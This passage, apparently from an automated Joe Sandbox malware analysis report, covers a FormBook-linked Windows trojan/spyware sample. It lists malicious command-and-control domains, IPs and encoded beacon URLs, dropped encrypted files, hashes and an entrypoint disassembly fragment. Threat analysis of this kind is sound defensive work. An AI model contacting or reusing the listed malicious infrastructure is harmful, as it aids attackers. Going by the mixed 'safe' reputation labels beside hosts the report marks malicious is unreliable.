                        		truetrue
                          		unknown
                          budged.net
                          		195.154.200.15
                          		truetrue
                            		unknown
                            www.5hdgb2p9a.buzz
                            		168.76.221.252
                            		truetrue
                              		unknown
                              www.j252mv.site
                              		150.95.254.16
                              		truetrue
                                		unknown
                                www.tingba.sbs
                                		172.67.202.10
                                		truetrue
                                  		unknown
                                  www.mt2rahu.tech
                                  		unknown
                                  		unknownfalse
                                    		unknown
                                    www.budged.net
                                    		unknown
                                    		unknownfalse
                                      		unknown
                                      www.lexjetcenter.net
                                      		unknown
                                      		unknownfalse
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.lnnn.fun/u5w9/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.7153115.xyz/dblf/true
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.lexjetcenter.net/ugdo/?eL-x=kxJ3od325Xqo8wxQ1hBgR6SDm2DyJ3wteCEI/DiGOvMuHKXdFQvV7KpJf8xNWNcGdoq0hBwRfp4PtcpQcJYcqVm6hUSlzi3DLiLBqaXQmTBihn830w==&wFVH=-zwTKPF0iPthtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.budged.net/zslv/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.j252mv.site/bjtw/?eL-x=csNti9Ni0CMSF+Luu5Lb4YGLWTncdI4NtLZHzGNdKQ96nntWCfQjnA+gcdSxDY8YzUt2/7rDdvxAnlLOvCpJP4lTvOHTPP+iYlkpfhDtlBKj7b5q5w==&wFVH=-zwTKPF0iPthtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.5hdgb2p9a.buzz/nl7t/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.jllllbx.top/14ny/?eL-x=RcS/7b6AyQg4ZUqZZRdiR4QAk8bBBIP44+AM+xEUzuW33DbFu14QWxhHRozVg07q+e31G6ugIhvO9kCRCtuNtETua9CX3TPbBNSnRMkK6/CxEYN7+Q==&wFVH=-zwTKPF0iPthtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.jllllbx.top/14ny/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.j252mv.site/bjtw/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.elarac.top/favd/?wFVH=-zwTKPF0iPth&eL-x=WtgtBzW4FsxMnQSuWOIYSeEoiXDfOi+mEu8byEiY5V0Es9uEUQhozXoYk37/fSn7c76G5+FTj9P/4AI0dbo7dAuFWhjyFRNqxijvASv2x9K31F87tg==true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.tingba.sbs/njro/?wFVH=-zwTKPF0iPth&eL-x=4m2dXuyzH1K67YjRiF0xgcinYZd6F04lkWHhJhjAgk74IEPWOAVZvwb6DAALc1Sd7YFs2hEz0292kCRHtftOb0bCUTNRw6g5HYfyDosdAoVL7yu4Ug==true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.lnnn.fun/u5w9/?eL-x=A3LutOpKcAePelibJkXDDYFDO+A/U7kX8Qw8AI5F82KOCrYaBuw+x7BD9zmk5lVUkEcfBKV2GIclDvoU+V9Cq0mSlb4StpI39XWYwC+owI+4erZmyw==&wFVH=-zwTKPF0iPthtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.elarac.top/favd/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.7153115.xyz/dblf/?eL-x=xA4m52UOO3AWG6dLOPkkJ91gfa/sOtMUS9WQ9/7Ili2Upd70ADnAJWaIHnvs9U+whG/nDh7qG8iCbCHdOukQeWX5e+ZPWvcCIT2YOJAlrSuLiE5N6g==&wFVH=-zwTKPF0iPthtrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.tingba.sbs/njro/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.budged.net/zslv/?eL-x=EUn3g8LYsBqqsV8ZNTlu3xKd6tkG7Tp6GSwv0X2RMky81SP9KPrWQ2UszFzoalUNSIFimuT2bUDct3BiYGyyefEtviAnix38iMVeAihtAydc/vF2ig==&wFVH=-zwTKPF0iPthtrue
                                        • Avira URL Cloud: safe
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabAtuserer.exe, 00000007.00000002.3167502665.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.onamae.com/?banner_id=634Atuserer.exe, 00000007.00000002.3165412212.0000000005A6E000.00000004.10000000.00040000.00000000.sdmp, avRLXQyosx.exe, 00000008.00000002.3164252655.0000000003BCE000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://duckduckgo.com/ac/?q=Atuserer.exe, 00000007.00000002.3167502665.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.gmo.jp/images/public/common/logo.gifAtuserer.exe, 00000007.00000002.3165412212.0000000005A6E000.00000004.10000000.00040000.00000000.sdmp, avRLXQyosx.exe, 00000008.00000002.3164252655.0000000003BCE000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Atuserer.exe, 00000007.00000002.3167502665.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Atuserer.exe, 00000007.00000002.3167502665.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.ecosia.org/newtab/Atuserer.exe, 00000007.00000002.3167502665.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://ac.ecosia.org/autocomplete?q=Atuserer.exe, 00000007.00000002.3167502665.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.onamae-server.com/Atuserer.exe, 00000007.00000002.3165412212.0000000005A6E000.00000004.10000000.00040000.00000000.sdmp, avRLXQyosx.exe, 00000008.00000002.3164252655.0000000003BCE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchAtuserer.exe, 00000007.00000002.3167502665.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.jllllbx.topavRLXQyosx.exe, 00000008.00000002.3166059888.00000000054DB000.00000040.80000000.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Atuserer.exe, 00000007.00000002.3167502665.0000000007A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://00808.vip/Atuserer.exe, 00000007.00000002.3165412212.00000000060B6000.00000004.10000000.00040000.00000000.sdmp, Atuserer.exe, 00000007.00000002.3167412341.0000000007780000.00000004.00000800.00020000.00000000.sdmp, avRLXQyosx.exe, 00000008.00000002.3164252655.0000000004216000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        		unknown

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        192.64.118.221
                                                        		www.elarac.topUnited States
                                                        		22612NAMECHEAP-NETUStrue
                                                        168.76.221.252
                                                        		www.5hdgb2p9a.buzzSouth Africa
                                                        		265240ULTRANETSERVICOSEMINTERNETLTDABRtrue
                                                        188.114.96.3
                                                        		www.lnnn.funEuropean Union
                                                        		13335CLOUDFLARENETUStrue
                                                        150.95.254.16
                                                        		www.j252mv.siteJapan7506INTERQGMOInternetIncJPtrue
                                                        103.249.106.91
                                                        		www.7153115.xyzChina
                                                        		137443ANCHGLOBAL-AS-APAnchnetAsiaLimitedHKtrue
                                                        172.67.202.10
                                                        		www.tingba.sbsUnited States
                                                        		13335CLOUDFLARENETUStrue
                                                        3.33.130.190
                                                        		lexjetcenter.netUnited States
                                                        		8987AMAZONEXPANSIONGBtrue
                                                        195.154.200.15
                                                        		budged.netFrance
                                                        		12876OnlineSASFRtrue
                                                        156.234.28.94
                                                        		www.jllllbx.topSeychelles
                                                        		136800XIAOZHIYUN1-AS-APICIDCNETWORKUStrue

                                                        General Information

                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1551211
                                                        Start date and time:2024-11-07 15:48:29 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 9m 41s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Run name:Run with higher sleep bypass
                                                        Number of analysed new started processes analysed:12
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:2
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:RO2Y11yOJ7.exe
                                                        renamed because original name is a hash value
                                                        Original Sample Name:12e60b3db1e0cb33c5e66d0c114b8fa1033984e21f3741e97111f41b37a04978.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@7/3@11/9
                                                        EGA Information:
                                                        • Successful, ratio: 75%
                                                        HCA Information:
                                                        • Successful, ratio: 92%
                                                        • Number of executed functions: 45
                                                        • Number of non-executed functions: 281
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                        • VT rate limit hit for: RO2Y11yOJ7.exe

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        09:50:38API Interceptor5400914x Sleep call for process: Atuserer.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        192.64.118.221ByuoedHi2e.exeGet hashmaliciousFormBookBrowse
                                                        • www.elarac.top/hcv9/
                                                        SECRFQ2024-0627 - ON HAND PROJECT - NEOM PROJECTS - SAUDI ELAF Co..exeGet hashmaliciousFormBookBrowse
                                                        • www.oporio.xyz/wsmp/
                                                        Technical Datasheet and Specification_PDF.exeGet hashmaliciousUnknownBrowse
                                                        • www.elarac.top/hcv9/?urk=NXuT&0dk=i0zpRIKfBsqaPcaPDER8nUxzZRFDCipl8J5u88RgJ30Dq0aXm679zDMOUT0OK9asUr9KPAhfInTfMeTLGuc3GC/U5s2GEaYqyn9930FNTUtQmFVEKg==
                                                        PR. No.1599-Rev.2.exeGet hashmaliciousUnknownBrowse
                                                        • www.dariuz.info/fr03/
                                                        168.76.221.252debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeGet hashmaliciousFormBookBrowse
                                                        • www.5hdgb2p9a.buzz/lxjv/
                                                        188.114.96.3ByuoedHi2e.exeGet hashmaliciousFormBookBrowse
                                                        • www.rihanaroly.sbs/othk/
                                                        Aviso de pago.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                        • paste.ee/d/PAg0l
                                                        QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • filetransfer.io/data-package/8shpYIj5/download
                                                        QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • filetransfer.io/data-package/CXujY04Y/download
                                                        QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • filetransfer.io/data-package/O2nyeCCn/download
                                                        2rI5YEg7uo.exeGet hashmaliciousFormBookBrowse
                                                        • www.evoolixyppuk.shop/7gfa/?pP=OC/NqFuXSoQKcxJzIwbC8gc6YWk63HA88JkIsR5MBtbsuoT1qNc3mE+usci2f4e+0fIXV/Px1LgbGc4SbpFIftMOxDoszWQURSPAVqq521dqxxqHUw==&UJO=A6MH4FUp
                                                        createdbestthingswithgoodnewswithgreatfriendship.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                        • paste.ee/d/PAg0l
                                                        QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • filetransfer.io/data-package/O7tfWEfj/download
                                                        NIlfETZ9aE.exeGet hashmaliciousFormBookBrowse
                                                        • www.timizoasisey.shop/agaq/
                                                        https://www.imap.ne.jp/banner_click/add/20/1/?a&url=http://uniteseoul.comGet hashmaliciousHTMLPhisherBrowse
                                                        • uniteseoul.com/

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        www.jllllbx.topSHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                        • 156.234.28.94
                                                        INVOICE_PO# PUO202300054520249400661.exeGet hashmaliciousFormBookBrowse
                                                        • 156.234.28.94
                                                        HT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exeGet hashmaliciousFormBookBrowse
                                                        • 156.234.28.94
                                                        OREN Engine Stores Requisition 4th quarter OREN-ES-2024-010 & OREN-ES-2024-011.exeGet hashmaliciousFormBookBrowse
                                                        • 156.234.28.94
                                                        www.tingba.sbsBkZqIS5vlv.exeGet hashmaliciousFormBookBrowse
                                                        • 104.21.22.22
                                                        NIlfETZ9aE.exeGet hashmaliciousFormBookBrowse
                                                        • 104.21.22.22
                                                        www.5hdgb2p9a.buzzdebit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeGet hashmaliciousFormBookBrowse
                                                        • 168.76.221.252
                                                        A4mmSHCUi2.exeGet hashmaliciousFormBookBrowse
                                                        • 168.76.221.252
                                                        www.j252mv.siteSECRFQ2024-0627 - ON HAND PROJECT - NEOM PROJECTS - SAUDI ELAF Co..exeGet hashmaliciousFormBookBrowse
                                                        • 150.95.254.16
                                                        debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeGet hashmaliciousFormBookBrowse
                                                        • 150.95.254.16
                                                        www.elarac.topByuoedHi2e.exeGet hashmaliciousFormBookBrowse
                                                        • 192.64.118.221
                                                        Technical Datasheet and Specification_PDF.exeGet hashmaliciousUnknownBrowse
                                                        • 192.64.118.221

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        CLOUDFLARENETUSW1D5wGM20v.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                        • 188.114.96.3
                                                        https://eu.docworkspace.com/d/sIGWvrvOeAYXvpLkGGet hashmaliciousUnknownBrowse
                                                        • 104.16.84.69
                                                        Q7oJsypKoV.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 188.114.97.3
                                                        xz8lxAetNu.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 188.114.96.3
                                                        Lpjrd6Wxad.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 188.114.96.3
                                                        khVFdtvf8F.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 188.114.96.3
                                                        https://app.smartsheet.com/b/form/d72b00b027df4e38a9b052ac176790d8Get hashmaliciousUnknownBrowse
                                                        • 104.17.25.14
                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                        • 104.21.5.155
                                                        https://docs.google.com/drawings/d/1L9giD0SHUwqCV6PUyhw5H1o5DG-sAxEzlNLyy8oPIRo/preview?usp=sharingGet hashmaliciousUnknownBrowse
                                                        • 104.18.95.41
                                                        QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 188.114.96.3
                                                        NAMECHEAP-NETUShttps://login-zendesk-account.servz.com.pkGet hashmaliciousHTMLPhisherBrowse
                                                        • 63.250.47.132
                                                        https://login-zendesk-account.servz.com.pkGet hashmaliciousHTMLPhisherBrowse
                                                        • 63.250.47.132
                                                        https://login-zendesk-account.servz.com.pkGet hashmaliciousHTMLPhisherBrowse
                                                        • 63.250.47.132
                                                        xBzBOQwywT.exeGet hashmaliciousFormBookBrowse
                                                        • 199.192.19.19
                                                        https://google.com:login@login-zendesk-account.servz.com.pk/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                        • 63.250.47.132
                                                        gTg6xY6fo2.exeGet hashmaliciousFormBookBrowse
                                                        • 162.0.225.218
                                                        ByuoedHi2e.exeGet hashmaliciousFormBookBrowse
                                                        • 192.64.118.221
                                                        Y7isAhMKal.exeGet hashmaliciousFormBookBrowse
                                                        • 162.0.231.203
                                                        r876789878767.cmdGet hashmaliciousDBatLoader, FormBookBrowse
                                                        • 162.0.232.49
                                                        ULTRANETSERVICOSEMINTERNETLTDABRdebug.dbg.elfGet hashmaliciousMirai, GafgytBrowse
                                                        • 168.72.250.109
                                                        debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeGet hashmaliciousFormBookBrowse
                                                        • 168.76.221.252
                                                        arm4.elfGet hashmaliciousMiraiBrowse
                                                        • 168.67.62.26
                                                        A4mmSHCUi2.exeGet hashmaliciousFormBookBrowse
                                                        • 168.76.221.252
                                                        la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                        • 168.73.238.77
                                                        splspc.elfGet hashmaliciousUnknownBrowse
                                                        • 168.73.238.27
                                                        botnet.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                        • 168.66.250.31
                                                        la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                        • 168.66.29.145
                                                        la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                        • 168.67.178.57
                                                        sh4.elfGet hashmaliciousUnknownBrowse
                                                        • 168.73.239.131

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Temp\00X412J3

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\Atuserer.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.1211596417522893
                                                        Encrypted:false
                                                        SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                        MD5:0AB67F0950F46216D5590A6A41A267C7
                                                        SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                        SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                        SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\Maianthemum

                                                        Download File
                                                        Process:C:\Users\user\Desktop\RO2Y11yOJ7.exe
                                                        File Type:ARC+ archive data
                                                        Category:dropped
                                                        Size (bytes):287744
                                                        Entropy (8bit):7.993704235508897
                                                        Encrypted:true
                                                        SSDEEP:6144:m2UIz4DBraP5i5k+Hbi036TwkpjF+c8KeRf4AK2WLwGzsax:hUBrIi5k+bd3GtSg/20Zp
                                                        MD5:2E92344600175568B7BBE0FD1BC2D0BB
                                                        SHA1:66BCFB5CFB60D3BD2227888BC43663FC2EEA1A08
                                                        SHA-256:652C306B0AD1808C6C0FB3D22811E42329AF39E2737EF026D082E0734FE501BB
                                                        SHA-512:9C1A655A80E7C1DB05CEF32747D0D15F90BF42E81B647ADB6B6923E479EBCD98D191B1F8FBC005C8CFFA91FA10A586AC62B7956040CE3D189BCB49FEF8317FA0
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:..}..0D0O..>....k.8O....LY...L438WN8LG0D0OQIQ7L438WN8LG0D0O.IQ7B+.6W.1.f.E|.p.9^?.CJ8)J-*.'Q!?&%..Q.J" .%)....q$>S).>5]j8LG0D0O(HX.qTT.j._.zP#.U...,S."...p'W.*...mW+.aQ4&., .D0OQIQ7Ldv8W.9MG..}.QIQ7L438.N:ML1O0O.MQ7L438WN8.S0D0_QIQGH438.N8\G0D2OQOQ7L438WH8LG0D0OQ9U7L638WN8LE0..OQYQ7\438W^8LW0D0OQIA7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D.;41%7L4.iSN8\G0DbKQIA7L438WN8LG0D0OqIQWL438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L

                                                        C:\Users\user\AppData\Local\Temp\aut92FB.tmp

                                                        Download File
                                                        Process:C:\Users\user\Desktop\RO2Y11yOJ7.exe
                                                        File Type:ARC+ archive data
                                                        Category:dropped
                                                        Size (bytes):287744
                                                        Entropy (8bit):7.993704235508897
                                                        Encrypted:true
                                                        SSDEEP:6144:m2UIz4DBraP5i5k+Hbi036TwkpjF+c8KeRf4AK2WLwGzsax:hUBrIi5k+bd3GtSg/20Zp
                                                        MD5:2E92344600175568B7BBE0FD1BC2D0BB
                                                        SHA1:66BCFB5CFB60D3BD2227888BC43663FC2EEA1A08
                                                        SHA-256:652C306B0AD1808C6C0FB3D22811E42329AF39E2737EF026D082E0734FE501BB
                                                        SHA-512:9C1A655A80E7C1DB05CEF32747D0D15F90BF42E81B647ADB6B6923E479EBCD98D191B1F8FBC005C8CFFA91FA10A586AC62B7956040CE3D189BCB49FEF8317FA0
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:..}..0D0O..>....k.8O....LY...L438WN8LG0D0OQIQ7L438WN8LG0D0O.IQ7B+.6W.1.f.E|.p.9^?.CJ8)J-*.'Q!?&%..Q.J" .%)....q$>S).>5]j8LG0D0O(HX.qTT.j._.zP#.U...,S."...p'W.*...mW+.aQ4&., .D0OQIQ7Ldv8W.9MG..}.QIQ7L438.N:ML1O0O.MQ7L438WN8.S0D0_QIQGH438.N8\G0D2OQOQ7L438WH8LG0D0OQ9U7L638WN8LE0..OQYQ7\438W^8LW0D0OQIA7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D.;41%7L4.iSN8\G0DbKQIA7L438WN8LG0D0OqIQWL438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L438WN8LG0D0OQIQ7L

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):7.083310287852298
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:RO2Y11yOJ7.exe
                                                        File size:1'324'032 bytes
                                                        MD5:5ffe1ba845fb6e48aae4367ef675444e
                                                        SHA1:b45e53f7bc9b7b2805c1bcd62c35f1554ecdc542
                                                        SHA256:12e60b3db1e0cb33c5e66d0c114b8fa1033984e21f3741e97111f41b37a04978
                                                        SHA512:7c4562cb64e420d4642c4f53ff08ed0a7dae0abca394ca3edd8d6c0294ec61247f62695d350c9a72ff0f16861c2d1693e9f3c69ded501c1706e466d1b67765d8
                                                        SSDEEP:24576:pCdxte/80jYLT3U1jfsWatVxttkhrFx5I+0SGTKdHAQQ:Yw80cTsjkWazxttyFxFQKdH2
                                                        TLSH:0A55BF5373CD8374C6B6D873BE59B3119FBB7C314260B8531FA4396A6B81171221EAA3
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                                                        File Icon

                                                        Icon Hash:2345e87068e84523

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x427f4a
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x671B854C [Fri Oct 25 11:47:24 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:5
                                                        OS Version Minor:1
                                                        File Version Major:5
                                                        File Version Minor:1
                                                        Subsystem Version Major:5
                                                        Subsystem Version Minor:1
                                                        Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                        Entrypoint Preview

                                                        Instruction
                                                        call 00007FBD7CB5DC6Dh
                                                        jmp 00007FBD7CB50A34h
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        int3
                                                        push edi
                                                        push esi
                                                        mov esi, dword ptr [esp+10h]
                                                        mov ecx, dword ptr [esp+14h]
                                                        mov edi, dword ptr [esp+0Ch]
                                                        mov eax, ecx
                                                        mov edx, ecx
                                                        add eax, esi
                                                        cmp edi, esi
                                                        jbe 00007FBD7CB50BBAh
                                                        cmp edi, eax
                                                        jc 00007FBD7CB50F1Eh
                                                        bt dword ptr [004C31FCh], 01h
                                                        jnc 00007FBD7CB50BB9h
                                                        rep movsb
                                                        jmp 00007FBD7CB50ECCh
                                                        cmp ecx, 00000080h
                                                        jc 00007FBD7CB50D84h
                                                        mov eax, edi
                                                        xor eax, esi
                                                        test eax, 0000000Fh
                                                        jne 00007FBD7CB50BC0h
                                                        bt dword ptr [004BE324h], 01h
                                                        jc 00007FBD7CB51090h
                                                        bt dword ptr [004C31FCh], 00000000h
                                                        jnc 00007FBD7CB50D5Dh
                                                        test edi, 00000003h
                                                        jne 00007FBD7CB50D6Eh
                                                        test esi, 00000003h
                                                        jne 00007FBD7CB50D4Dh
                                                        bt edi, 02h
                                                        jnc 00007FBD7CB50BBFh
                                                        mov eax, dword ptr [esi]
                                                        sub ecx, 04h
                                                        lea esi, dword ptr [esi+04h]
                                                        mov dword ptr [edi], eax
                                                        lea edi, dword ptr [edi+04h]
                                                        bt edi, 03h
                                                        jnc 00007FBD7CB50BC3h
                                                        movq xmm1, qword ptr [esi]
                                                        sub ecx, 08h
                                                        lea esi, dword ptr [esi+08h]
                                                        movq qword ptr [edi], xmm1
                                                        lea edi, dword ptr [edi+08h]
                                                        test esi, 00000007h
                                                        je 00007FBD7CB50C15h
